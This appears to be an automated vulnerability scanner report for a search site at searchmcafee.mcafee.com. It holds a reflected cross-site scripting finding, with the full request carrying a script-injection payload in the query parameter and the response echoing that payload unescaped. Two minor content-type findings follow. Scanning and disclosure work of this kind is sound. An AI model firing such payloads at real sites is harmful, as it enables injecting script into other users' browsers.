1. Cross-site scripting (reflected)
2. Content type incorrectly stated
2.1. http://searchmcafee.mcafee.com/apps/search/helper.html
2.2. http://searchmcafee.mcafee.com/img/arrow-link.png
Severity: | High |
Confidence: | Certain |
Host: | http://searchmcafee |
Path: | /search |
GET /search?q=xss15150<script>alert(1)< Host: searchmcafee.mcafee.com Proxy-Connection: keep-alive Referer: http://www.mcafee.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|272A8C26 |
HTTP/1.0 200 OK Connection: Close Cache-Control: private Content-Type: text/html Server: GWS/2.1 Date: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Content-Length: 9788 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN DTD" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <span xmlns="" id="Searchkeywords" style="display:none">xss15150<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://searchmcafee |
Path: | /apps/search/helper.html |
GET /apps/search/helper.html HTTP/1.1 Host: searchmcafee.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 404 Not Found Connection: Close Content-Type: text/html; charset=UTF-8 Content-Length: 62 This page does not exist or you are not authorized to view it. |
Severity: | Information |
Confidence: | Firm |
Host: | http://searchmcafee |
Path: | /img/arrow-link.png |
GET /img/arrow-link.png HTTP/1.1 Host: searchmcafee.mcafee.com Proxy-Connection: keep-alive Referer: http://searchmcafee User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|272A8C26 |
HTTP/1.0 404 Not Found Connection: Close Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 62 This page does not exist or you are not authorized to view it. |